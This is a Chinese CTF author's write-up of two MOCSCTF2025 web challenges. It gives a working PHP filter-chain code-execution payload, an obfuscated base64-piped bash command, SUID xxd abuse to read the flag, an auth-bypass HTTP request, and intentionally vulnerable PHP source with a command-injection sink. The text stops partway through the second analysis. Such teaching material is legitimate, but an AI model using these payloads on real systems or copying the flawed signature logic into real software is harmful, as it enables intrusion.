{"id":3905,"date":"2025-07-14T23:49:51","date_gmt":"2025-07-14T15:49:51","guid":{"rendered":"https:\/\/fushuling.com\/?p=3905"},"modified":"2025-09-09T15:33:18","modified_gmt":"2025-09-09T07:33:18","slug":"mocsctf2025-ez-writeez-injection","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2025\/07\/14\/mocsctf2025-ez-writeez-injection\/","title":{"rendered":"MOCSCTF2025 ez-write&&ez-injection"},"content":{"rendered":"\n

\u6bd4\u8d5b\u94fe\u63a5\uff1ahttps:\/\/mocsctf.com\/events.html?id=mocsctf-2025<\/a><\/p>\n\n\n\n

\u8fd9\u6b21\u6bd4\u8d5b\u51fa\u4e86\u4e24\u9053web\uff0c\u5f53\u7136\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u6bd4\u8d5b\u672c\u6765\u5c31\u662f\u7ed9\u6fb3\u95e8\u7684\u9ad8\u4e2d\u751f\u6253\u7684\uff0c\u53ea\u662f\u6709\u516c\u5f00\u8d5b\u8d5b\u9053\uff0c\u800c\u4e14\u516c\u5f00\u8d5b\u8d5b\u9053\u8f83\u4e3a\u62bd\u8c61\uff0c\u4e00\u4e2a\u4eba\u4e00\u961f\uff0c\u516b\u4e2a\u5c0f\u65f6\u56db\u5341\u9053\u9898\uff0c\u6240\u4ee5\u6211\u4eec\u8fd9\u8fb9\u51fa\u7684\u9898\u672c\u6765\u4e5f\u4e0d\u7b97\u592a\u96be\uff0c\u53ef\u60dc\u611f\u89c9\u8fd8\u662f\u6ca1\u591a\u5c11\u4eba\u6765\u770b\u9898\uff0c\u5bfc\u81f4\u6211\u8fd9\u4fe9\u9898\u4e00\u9053\u4e00\u89e3\uff0c\u4e00\u9053\u96f6\u89e3\u3002\u540e\u9762\u5b98\u65b9\u5e94\u8be5\u4f1a\u653edocker\u548cwp\uff0c\u8fd9\u91cc\u6211\u5c31\u8bb2\u8bb2\u601d\u8def\u4e86\uff0c\u5982\u679c\u8981docker\u53ef\u4ee5\u627e\u6211\u8981\u3002<\/s>docker\u73af\u5883\uff1ahttps:\/\/github.com\/MOCSCTF\/MOCSCTF2025-Writeup<\/a><\/p>\n\n\n\n

ez-write<\/h1>\n\n\n\n

\u51fa\u9898\u601d\u8def\u4e3b\u8981\u5c31\u662f\u6211\u4e4b\u524d\u7684\u4e00\u7bc7\u535a\u5ba2\uff0c\u8fd9\u4e2a\u6708\u4e13\u95e8\u9690\u85cf\u4e86\uff1a\u8001\u6d1e\u65b0\u6c34\u4e4b\u590d\u6d3bCVE-2018-9174<\/a>\uff0c\u4e3b\u8981\u662f\u5c31\u662f\u6628\u5e74\u505a\u5b9e\u8bad\u7684\u65f6\u5019\u987a\u624b\u6316\u7684\u4e00\u4e2adedecms\u7684\u6d1e\uff0c\u56e0\u4e3a\u5229\u7528\u8fc7\u7a0b\u6bd4\u8f83\u6709\u610f\u601d\u6240\u4ee5\u62ff\u51fa\u6765\u51fa\u4e86\uff0c\u4f46\u6574\u4f53\u96be\u5ea6\u5e94\u8be5\u4e0d\u7b97\u5927\uff0c\u51fa\u7684\u65f6\u5019\u8fd8\u4e13\u95e8\u628a\u53cd\u5f15\u53f7\u90fdban\u4e86\uff0c\u6ca1\u60f3\u5230\u7adf\u7136\u53ea\u6709\u4e00\u89e3\u3002<\/p>\n\n\n\n

\u8d5b\u9898\u7684\u4ee3\u7801\u6bd4\u8f83\u7b80\u5355\uff1a<\/p>\n\n\n\n

 <?php\nhighlight_file(__FILE__);\n$filename = $_POST['refiles'] ?? [];\n$filename = preg_replace('\/[\";()`]\/', '', $filename);\nfile_put_contents('tmp.php', \"<?php\\n\\$files = \\\"$filename\\\";\\n?>\");<\/code><\/pre>\n\n\n\n
\u7b80\u5355\u6765\u8bf4\uff0c\u6211\u4eec\u53ef\u4ee5\u5411\u4e00\u4e2a\u88ab\u53cc\u5f15\u53f7\u5305\u88f9\u4e86\u7684\u5730\u65b9\u5199\u5165\u4ee3\u7801\uff0c\u4e0d\u8fc7\u6211\u4eec\u4e0d\u80fd\u4f7f\u7528\u53cc\u5f15\u53f7\u3001\u62ec\u53f7\u3001\u5206\u53f7\u548c\u53cd\u5f15\u53f7\uff0c\u8fd9\u91cc\u7528\u5230\u4e24\u4e2atrick\uff0c\u9996\u5148\uff0cphp\u91cc\u5982\u679c\u88ab\u53cc\u5f15\u53f7\u5305\u56f4\uff0c\u6211\u4eec\u8fd8\u662f\u53ef\u4ee5\u4f7f\u7528${ php\u4ee3\u7801}<\/code>\u7684\u65b9\u6cd5\u6267\u884c\u88ab${}\u5305\u88f9\u7684\u4ee3\u7801\uff0c\u4e0d\u8fc7\u8fd9\u91cc\u7531\u4e8e\u4e0d\u5141\u8bb8\u4f7f\u7528\u62ec\u53f7\u548c\u53cd\u5f15\u53f7\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u80fd\u4f7f\u7528\u4e00\u4e9b\u6ca1\u6709\u62ec\u53f7\u7684\u51fd\u6570\uff0c\u6bd4\u5982include\uff0c\u8fd9\u91cc\u7528\u5230\u7684\u53e6\u4e00\u4e2atrick\u5c31\u662f\u9646\u961fThe End Of LFI?<\/a>\u91cc\u63d0\u5230\u7684\u4e00\u4e2a\u6280\u5de7\uff0c\u5229\u7528 PHP Base64 Filter \u5bbd\u677e\u7684\u89e3\u6790\uff0c\u901a\u8fc7 iconv filter \u7b49\u7f16\u7801\u7ec4\u5408\u6784\u9020\u51fa\u7279\u5b9a\u7684 PHP \u4ee3\u7801\uff0c\u8fd9\u91cc\u6700\u540e\u80fd\u6253\u901a\u7684payload\u5982\u4e0b\uff1a<\/p>\n\n\n\n
refiles=${ include 'php:\/\/filter\/convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=\/etc\/passwd'}<\/code><\/pre>\n\n\n\n
\u63a5\u7740\u8bbf\u95eetmp.php\u5373\u53ef\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e0d\u8fc7\u6211\u4eec\u76f4\u63a5\u8bfbflag\u6ca1\u6709\u6743\u9650\uff1a<\/p>\n\n\n\n
bash -c '{echo,\"Y2F0IC9mKiAyPiYx\"}|{base64,-d}|{bash,-i}'<\/code><\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u67e5\u4e00\u4e0bsuid\uff0c\u53ef\u4ee5\u60f3\u5230\u7528xxd\u8bfb\u53d6\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6700\u540e\u76f4\u63a5xxd \/f*\u5373\u53ef\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
ez-injection<\/h1>\n\n\n\n
\u8fd9\u9053\u9898\u51fa\u9898\u601d\u8def\u5176\u5b9e\u662f\u6211\u7684\u53e6\u4e00\u7bc7\u535a\u5ba2\uff1a\u518d\u8c08\u9884\u7f16\u8bd1\u4e0esql\u6ce8\u5165<\/a>\uff0c\u4e3b\u8981\u5c31\u662f\u90a3\u7bc7DEF CON\u8bae\u9898\uff0c\u5728\u534f\u8bae\u5c42\u8fdb\u884c\u6ce8\u5165\uff0c\u633a\u6709\u610f\u601d\u7684\uff0c\u4e0d\u77e5\u9053\u56fd\u5185\u6709\u6ca1\u6709\u4eba\u62ff\u8fd9\u4e2a\u51fa\u8fc7\u9898\u3002<\/p>\n\n\n\n
\u9898\u76ee\u7684\u4ee3\u7801\u6bd4\u8f83\u7b80\u5355\uff0c\u5c31\u4e24\u4e2aphp\u6587\u4ef6\uff1a<\/p>\n\n\n\n
<?php\n#index.php\n$Secret_key = \"xxxxx\"; \/\/\u4e00\u4e32\u968f\u673a\u5b57\u7b26\n\nfunction checkSignature($signature)\n{\n    try {\n        $decoded = base64_decode($signature, true);\n        if ($decoded === false) {\n            throw new Exception(\"Invalid base64 encoding\");\n        }\n        global $Secret_key;\n        return $decoded === $Secret_key;\n    } catch (Exception $e) {\n        echo $e->getMessage() . PHP_EOL;\n    }\n}\n\nfunction verifySignature($headers)\n{\n    if (!isset($headers['X-Signature'])) {\n        return false;\n    }\n    $validSignature = $headers['X-Signature'];\n    if (checkSignature($validSignature) === false) {\n        return false;\n    }\n    return true;\n}\n\nif (!verifySignature(getallheaders())) {\n    http_response_code(403);\n?>\n    <div style=\"\n        margin: 50px auto;\n        padding: 20px;\n        max-width: 600px;\n        background-color: #ffe6e6;\n        color: #a94442;\n        border: 1px solid #f5c6cb;\n        border-left: 5px solid #d9534f;\n        border-radius: 8px;\n        font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\n        box-shadow: 0 0 10px rgba(0,0,0,0.1);\n        \">\n        <h2>\u26a0\ufe0f \u7b7e\u540d\u9a8c\u8bc1\u5931\u8d25<\/h2>\n        <p>\u60a8\u7684\u8bf7\u6c42\u672a\u901a\u8fc7\u9a8c\u8bc1\uff0c\u53ef\u80fd\u5b58\u5728\u4f2a\u9020\u884c\u4e3a\u6216\u7b7e\u540d\u9519\u8bef\u3002<\/p>\n    <\/div>\n<?php\n    exit;\n}\n\nfunction base64url_encode($data)\n{\n    return rtrim(strtr(base64_encode($data), '+\/', '-_'), '=');\n}\n\nfunction encrypt($data, $key)\n{\n    $method = 'AES-256-CBC';\n    $iv = openssl_random_pseudo_bytes(16);\n    $encrypted = openssl_encrypt($data, $method, $key, OPENSSL_RAW_DATA, $iv);\n    return base64url_encode($iv . $encrypted);\n}\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST') {\n    $function = $_POST['function'] ?? '';\n\n    $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';\n    $host = $_SERVER['SERVER_ADDR'];\n    $baseUrl = $protocol . ':\/\/' . $host;\n\n    $data = '';\n    if ($function === 'A') {\n        $command = 'date';\n        $data = bin2hex('A' . pack('n', strlen($command)) . $command);\n    } elseif ($function === 'B') {\n        $date = $_POST['date'] ?? '';\n        $command = $date;\n        $data = bin2hex('B' . pack('n', strlen($command)) . $command);\n    } elseif ($function === 'C') {\n        $weekdate = $_POST['weekdate'] ?? '';\n        $timestamp = strtotime($weekdate);\n        if ($timestamp === false) {\n            $result = '<div class=\"result\"><h3>\u6267\u884c\u7ed3\u679c\uff1a<\/h3><pre>\u65e0\u6548\u7684\u65e5\u671f\u683c\u5f0f<\/pre><\/div>';\n        } else {\n            $monday = strtotime('last monday', $timestamp);\n            if (date('N', $timestamp) == 1) $monday = $timestamp;\n            $combined = '';\n            for ($i = 0; $i < 7; $i++) {\n                $day = date('Y-m-d', strtotime(\"+$i day\", $monday));\n                $command = $day;\n                $combined .= 'B' . pack('n', strlen($command)) . $command;\n            }\n            $data = bin2hex($combined);\n        }\n    }\n\n    if (!empty($data)) {\n        $encryptedSource = encrypt('index.php', $Secret_key);\n        $ch = curl_init();\n        curl_setopt($ch, CURLOPT_URL, $baseUrl . '\/execute.php');\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n        curl_setopt($ch, CURLOPT_HTTPHEADER, [\n            'X-Source: ' . $encryptedSource,\n            'Content-Type: application\/octet-stream'\n        ]);\n        curl_setopt($ch, CURLOPT_POST, true);\n        curl_setopt($ch, CURLOPT_POSTFIELDS, hex2bin($data));\n        curl_setopt($ch, CURLOPT_TIMEOUT, 5);\n        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);\n\n        $response = curl_exec($ch);\n        $error = curl_error($ch);\n        curl_close($ch);\n\n        $result = $error\n            ? '<div class=\"result\"><h3>\u6267\u884c\u7ed3\u679c\uff1a<\/h3><pre>\u8bf7\u6c42\u5931\u8d25: ' . htmlspecialchars($error) . '<\/pre><\/div>'\n            : '<div class=\"result\"><h3>\u6267\u884c\u7ed3\u679c\uff1a<\/h3><pre>' . $response . '<\/pre><\/div>';\n    }\n}\n?>\n<!DOCTYPE html>\n<html>\n\n<head>\n    <title>\u529f\u80fd\u9009\u62e9<\/title>\n    <style>\n        body {\n            font-family: Arial, sans-serif;\n            max-width: 800px;\n            margin: 0 auto;\n            padding: 20px;\n        }\n\n        .container {\n            display: flex;\n            flex-direction: column;\n            gap: 20px;\n        }\n\n        .function {\n            border: 1px solid #ddd;\n            padding: 20px;\n            border-radius: 5px;\n        }\n\n        input[type=\"text\"] {\n            padding: 8px;\n            margin: 5px 0;\n            width: 200px;\n        }\n\n        button {\n            padding: 8px 16px;\n            background-color: #4CAF50;\n            color: white;\n            border: none;\n            border-radius: 4px;\n            cursor: pointer;\n        }\n\n        button:hover {\n            background-color: #45a049;\n        }\n\n        .result {\n            margin-top: 20px;\n            padding: 10px;\n            border: 1px solid #ddd;\n            border-radius: 5px;\n            background-color: #f9f9f9;\n        }\n    <\/style>\n<\/head>\n\n<body>\n    <div class=\"container\">\n        <h1>\u529f\u80fd\u9009\u62e9<\/h1>\n\n        <div class=\"function\">\n            <h2>\u5f53\u524d\u7cfb\u7edf\u65f6\u95f4<\/h2>\n            <form method=\"post\">\n                <input type=\"hidden\" name=\"function\" value=\"A\">\n                <button type=\"submit\">\u6267\u884c<\/button>\n            <\/form>\n        <\/div>\n\n        <div class=\"function\">\n            <h2>\u89e3\u6790\u6307\u5b9a\u65e5\u671f<\/h2>\n            <form method=\"post\" onsubmit=\"return validateDate(this.date.value);\">\n                <input type=\"hidden\" name=\"function\" value=\"B\">\n                <input type=\"text\" name=\"date\" placeholder=\"\u8f93\u5165\u65e5\u671f (YYYY-MM-DD)\" required pattern=\"\\d{4}-\\d{2}-\\d{2}\">\n                <button type=\"submit\">\u6267\u884c<\/button>\n            <\/form>\n        <\/div>\n\n        <div class=\"function\">\n            <h2>\u89e3\u6790\u67d0\u65e5\u671f\u6240\u5728\u5468\u7684\u6bcf\u5929<\/h2>\n            <form method=\"post\" onsubmit=\"return validateDate(this.weekdate.value);\">\n                <input type=\"hidden\" name=\"function\" value=\"C\">\n                <input type=\"text\" name=\"weekdate\" placeholder=\"\u8f93\u5165\u65e5\u671f (YYYY-MM-DD)\" required pattern=\"\\d{4}-\\d{2}-\\d{2}\">\n                <button type=\"submit\">\u6267\u884c<\/button>\n            <\/form>\n        <\/div>\n\n        <script>\n            function validateDate(dateStr) {\n                const regex = \/^\\d{4}-\\d{2}-\\d{2}$\/;\n                if (!regex.test(dateStr)) {\n                    alert(\"\u8bf7\u8f93\u5165\u6b63\u786e\u7684\u65e5\u671f\u683c\u5f0f\uff1aYYYY-MM-DD\");\n                    return false;\n                }\n                return true;\n            }\n        <\/script>\n\n        <?php if (isset($result)): ?>\n            <?php echo $result; ?>\n        <?php endif; ?>\n    <\/div>\n<\/body>\n\n<\/html><\/code><\/pre>\n\n\n\n
<?php\n#execute.php\n$Secret_key = \"xxxxx\"; \/\/\u4e00\u4e32\u968f\u673a\u5b57\u7b26\n\nfunction base64url_decode($data)\n{\n    return base64_decode(strtr($data, '-_', '+\/') . str_repeat('=', (4 - strlen($data) % 4) % 4));\n}\n\nfunction decrypt($data, $key)\n{\n    $method = 'AES-256-CBC';\n    $data = base64url_decode($data);\n    $iv = substr($data, 0, 16);\n    $encrypted = substr($data, 16);\n    return openssl_decrypt($encrypted, $method, $key, OPENSSL_RAW_DATA, $iv);\n}\n\nfunction isValidDate($date)\n{\n    $d = DateTime::createFromFormat('Y-m-d', $date);\n    return $d && $d->format('Y-m-d') === $date;\n}\n\nif (!isset($_SERVER['HTTP_X_SOURCE'])) {\n    die(\"\u975e\u6cd5\u8bbf\u95ee\");\n}\n\n$source = decrypt($_SERVER['HTTP_X_SOURCE'], $Secret_key);\nif ($source !== 'index.php') {\n    die(\"\u975e\u6cd5\u8bbf\u95ee\");\n}\n\n$input = file_get_contents('php:\/\/input');\nif (strlen($input) < 3) {\n    die(\"\u65e0\u6548\u7684\u8bf7\u6c42\u6570\u636e\");\n}\n\n$offset = 0;\n$outputAll = [];\n\nwhile ($offset + 3 <= strlen($input)) {\n    $type = $input[$offset];\n    $length = unpack('n', substr($input, $offset + 1, 2))[1];\n    $command = substr($input, $offset + 3, $length);\n    $offset += 3 + $length;\n    if ($type != \"B\" && $type != \"A\") {\n        die(\"\u9519\u8bef\u7684\u534f\u8bae\u683c\u5f0f\");\n    }\n    if ($type === \"B\") {\n        $date = $command;\n        if (!isValidDate($date)) {\n            die(\"\u65e5\u671f\u683c\u5f0f\u9519\u8bef\");\n        }\n        $command = \"date -d \" . $date;\n    }\n    ob_start();\n    system($command);\n    $result = ob_get_clean();\n    echo \"<div class='block'><pre>\" . htmlspecialchars($result) . \"<\/pre><\/div>\";\n}\n<\/code><\/pre>\n\n\n\n
\u76f4\u63a5\u8bbf\u95ee\u9875\u9762\uff0c\u4f1a\u663e\u793a\u7b7e\u540d\u9a8c\u8bc1\u5931\u8d25\uff0c\u62d2\u7edd\u8bbf\u95ee\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u76f4\u63a5\u5b9a\u4f4d\u5230\u4ee3\u7801\u7684\u90e8\u5206\uff0c\u53ef\u4ee5\u53d1\u73b0\u7b7e\u540d\u7684\u903b\u8f91\u5176\u5b9e\u662f\u5224\u65ad\u4f60\u7684\u8bf7\u6c42\u5934\u91cc\u662f\u4e0d\u662f\u5e26\u4e86X-Signature\u5b57\u6bb5\uff0c\u7136\u540e\u7528\u8fd9\u4e2a\u5b57\u6bb5\u89e3\u7801\u540e\u548c$Secret_Key\u8fdb\u884c\u6bd4\u8f83\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f46\u8fd9\u91cc\u7684checkSignature\u51fd\u6570\u4ee5\u53caverifySignature\u51fd\u6570\u7684\u9a8c\u8bc1\u914d\u5408\u5b58\u5728\u4e00\u4e2a\u4e25\u91cd\u7684\u903b\u8f91\u7f3a\u9677\uff0ccheckSignature\u53ea\u662f\u5728\u80fd\u6b63\u5e38\u89e3\u7801\u7684\u65f6\u5019\u628a\u7b7e\u540d\u548c$Secret_Key\u8fdb\u884c\u6bd4\u8f83\uff0c\u8fd4\u56de\u771f\u6216\u8005\u5047\uff0c\u800cverifySignature\u53ea\u6709\u5728checkSignature\u8fd4\u56de\u5047\u7684\u65f6\u5019\u624d\u9000\u51fa\uff0c\u5426\u5219\u9ed8\u8ba4\u8fd4\u56de\u771f\uff0c\u90a3\u4e48\u8fd9\u91cc\u6211\u4eec\u5176\u5b9e\u53ea\u9700\u8981\u6784\u9020\u4e00\u4e2a\u9519\u8bef\u7684base64\u7f16\u7801\uff0c\u6bd4\u5982@@@\uff0c\u8ba9checkSignature\u89e3\u7801\u9519\u8bef\uff0c\u90a3\u4e48\u8be5\u51fd\u6570\u5c31\u4f1a\u629b\u51fa\u9519\u8bef\uff0c\u4e14\u4e0d\u4f1a\u8fd4\u56de\u5047\uff0cverifySignature\u4e5f\u80fd\u6b63\u5e38\u901a\u8fc7\uff08\u4f60\u53ef\u80fd\u89c9\u5f97\u4e16\u754c\u4e0a\u4e0d\u4f1a\u6709\u4eba\u8fd9\u4e48\u5199\u4ee3\u7801\uff0c\u4f46\u5b9e\u9645\u4e0a\u8fd9\u662f\u67d0\u4e92\u8054\u7f51\u516c\u53f8\u7684\u771f\u5b9e\u4ee3\u7801\u903b\u8f91\uff09\uff1a<\/p>\n\n\n\n
GET \/ HTTP\/1.1\nHost: localhost:9999\nX-Signature:@@@\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko\/20100101 Firefox\/137.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate, br\nConnection: close\nUpgrade-Insecure-Requests: 1\nPriority: u=0, i<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u63a5\u7740\u5206\u6790\u6e90\u7801\u53ef\u4ee5\u770b\u51fa\u6765\uff0c\u8fd9\u4e2a\u529f\u80fd\u754c\u9762\u5176\u5b9e\u662f\u6709\u4e09\u4e2a\u529f\u80fd\uff0c\u540e\u4e24\u4e2a\u529f\u80fd\u9700\u8981\u4f20\u5165\u4e00\u4e2a\u65e5\u671f\uff0c\u800c\u529f\u80fd\u4e00\u4ec0\u4e48\u4e5f\u4e0d\u9700\u8981\u4f20\u5165\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u8fd9\u91ccindex.php\u548cexecute.php\u901a\u8fc7\u6784\u9020\u7684\u4e8c\u8fdb\u5236\u534f\u8bae\u8fdb\u884c\u4f20\u8f93\uff0c\u6784\u9020\u903b\u8f91\u662f\uff1a\u6807\u5fd7\u5b57\u6bb5+\u547d\u4ee4\u957f\u5ea6+\u5b9e\u9645\u7684\u547d\u4ee4\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5728execute.php\u4e2d\u4f1a\u9996\u5148\u5224\u65ad\u6765\u6e90\u662f\u5426\u662findex.php\uff0c\u5224\u65ad\u6210\u529f\u540e\u5bf9\u4f20\u5165\u7684\u4e8c\u8fdb\u5236\u534f\u8bae\u8fdb\u884c\u89e3\u6790\uff0c\u82e5\u6807\u5fd7\u5b57\u6bb5\u662fA\uff0c\u76f4\u63a5\u6267\u884c\u547d\u4ee4\uff0c\u82e5\u6807\u5fd7\u5b57\u6bb5\u662fB\uff0c\u5219\u4f1a\u5224\u65ad\u4f20\u5165\u7684\u547d\u4ee4\u662f\u5426\u662f\u4e00\u4e2a\u5408\u6cd5\u7684\u65e5\u671f\u683c\u5f0f\uff0c\u5224\u65ad\u6210\u529f\u540e\u62fc\u63a5date -d\u8fdb\u884c\u6267\u884c\uff0c\u5426\u5219\u9000\u51fa<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u8fd9\u91cc\u6211\u4eec\u672c\u5730\u6293\u4e00\u4e0b\u67e5\u770b\u65e5\u671f\u7684\u5305\uff0c\u770b\u4e00\u4e0b\u4e8c\u8fdb\u5236\u534f\u8bae\u7684\u6784\u9020\u7ec6\u8282\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u4f20\u5165\u7684\u4e8c\u8fdb\u5236\u6570\u636e\u662f\uff1a<\/p>\n\n\n\n
42000a323031322d31322d3131<\/code><\/pre>\n\n\n\n
\u5176\u4e2d42\u662fB\u7684\u5341\u516d\u8fdb\u5236\uff0c\u4ee3\u8868\u4e86\u8fd9\u6b21\u534f\u8bae\u7684\u6807\u5fd7B\uff0c000a\u4ee3\u8868\u4e86\u8fd9\u6b21\u8bf7\u6c42\u8f7d\u8377\u7684\u957f\u5ea6\u662f10\uff0c\u540e\u9762\u7684323031322d31322d3131\u5c31\u662f\u5b9e\u9645\u8f7d\u83772012-12-21<\/p>\n\n\n\n
\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u6076\u610f\u6784\u9020\u4e00\u4e2a\u9519\u8bef\u7684\u6570\u636e\uff0c\u6bd4\u5982\u57282012-12-21\u540e\u9762\u52a010\u4e2aA\uff0c\u53ef\u4ee5\u770b\u5230\u6b64\u65f6\u7684\u957f\u5ea6\u5c31\u53d8\u6210\u4e860014\uff0c\u4e5f\u5c31\u662f20\uff0c\u8fd9\u8bc1\u660e\u6211\u4eec\u6076\u610f\u6784\u9020\u4e00\u4e2a\u6bd4\u8f83\u957f\u7684\u6570\uff0c\u8fd9\u4e2a\u957f\u5ea6\u5b57\u6bb5\u786e\u5b9e\u4f1a\u968f\u4e4b\u589e\u957f\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53ea\u4e0d\u8fc7\u540e\u7aef\u8fd9\u91cc\u5b58\u5728\u6821\u9a8c\uff0c\u5224\u65ad\u5230\u4f60\u7684\u6807\u5934\u662fB\uff0c\u4f1a\u7528\u4f60\u7684\u8f7d\u8377\u5bf9\u6bd4\u662f\u5426\u662f\u5408\u6cd5\u7684\u65e5\u671f\uff0c\u4e0d\u662f\u7684\u8bdd\u8fd8\u662f\u4e0d\u80fd\u6267\u884c\uff0c\u9664\u975e\u6807\u5934\u662fA\u624d\u4f1a\u76f4\u63a5\u6267\u884c\uff0c\u4f46\u6211\u4eec\u5e76\u6ca1\u6709\u53ef\u63a7\u70b9\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
